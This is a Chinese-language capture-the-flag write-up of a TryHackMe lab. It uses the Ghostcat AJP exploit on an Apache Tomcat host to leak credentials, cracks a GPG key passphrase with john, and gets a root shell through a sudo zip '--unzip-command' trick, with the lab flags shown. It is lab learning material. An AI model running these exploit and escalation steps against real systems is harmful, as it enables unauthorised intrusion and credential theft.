渗透学习

Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark
管理员注意:此房间包含包含脏话的用户名形式的不当内容,应注意教育设置。-黑暗

1.扫描端口服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿kali)-[~]
└─# nmap -sV -vv 10.10.164.145                
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 12:21 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 12:21
Scanning 10.10.164.145 [4 ports]
Completed Ping Scan at 12:21, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:21
Completed Parallel DNS resolution of 1 host. at 12:21, 0.03s elapsed
Initiating SYN Stealth Scan at 12:21
Scanning 10.10.164.145 [1000 ports]
Discovered open port 22/tcp on 10.10.164.145
Discovered open port 8080/tcp on 10.10.164.145
Discovered open port 53/tcp on 10.10.164.145
Discovered open port 8009/tcp on 10.10.164.145
Completed SYN Stealth Scan at 12:21, 4.25s elapsed (1000 total ports)
Initiating Service scan at 12:21
Scanning 4 services on 10.10.164.145
Completed Service scan at 12:21, 9.25s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.164.145.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:21
Completed NSE at 12:21, 1.28s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:21
Completed NSE at 12:21, 1.04s elapsed
Nmap scan report for 10.10.164.145
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2023-08-05 12:21:19 CST for 16s
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped syn-ack ttl 63
8009/tcp open  ajp13      syn-ack ttl 63 Apache Jserv (Protocol v1.3)
8080/tcp open  http       syn-ack ttl 63 Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.63 seconds
           Raw packets sent: 1148 (50.488KB) | Rcvd: 1002 (40.084KB)

发现使用apache tomact ,查看是否有相关漏洞

image-20230805122412563

试试

2.漏洞侵入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[/]
└─# python2 /usr/share/exploitdb/exploits/multiple/webapps/48143.py 10.10.164.145
Getting resource at ajp13://10.10.164.145:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

账号密码:skyfuck:8730281lkjlkjdqlksalks

得到user.txt

1
2
3
4
5
skyfuck@ubuntu:/home$ cd merlin
skyfuck@ubuntu:/home/merlin$ ls
user.txt
skyfuck@ubuntu:/home/merlin$ cat user.txt
THM{GhostCat_1s_so_cr4sy}

3.sudo提权

破解merlin的密码:

1
2
3
4
5
6
7
8
9
10
11
12
john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)     
1g 0:00:00:00 DONE (2023-08-05 13:11) 12.50g/s 13400p/s 13400c/s 13400C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

解出merlin的密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: already in secret keyring
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1
skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

进入merlin的用户

1
2
skyfuck@ubuntu:~$ su merlin
Password: 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ touch 1.txt
merlin@ubuntu:~$ sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig"
  adding: 1.txt (stored 0%)
eth0      Link encap:Ethernet  HWaddr 02:ae:63:5b:54:07  
          inet addr:10.10.164.145  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::ae:63ff:fe5b:5407/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:3347 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4283 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:233364 (233.3 KB)  TX bytes:455002 (455.0 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

test of 1.zip OK
merlin@ubuntu:~$ sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/sh"
updating: 1.txt (stored 0%)
# ls
1.txt  1.zip  user.txt  ziazgf1h
# cd ../..
# cd rppt
/bin/sh: 3: cd: can't cd to rppt
# cd root
# cat toot.txt
cat: toot.txt: No such file or directory
# ls
root.txt  ufw
# cat root.txt
THM{Z1P_1S_FAKE}

相关文档:linux zip 提权_sudo zip_LuckyCharm~的博客-CSDN博客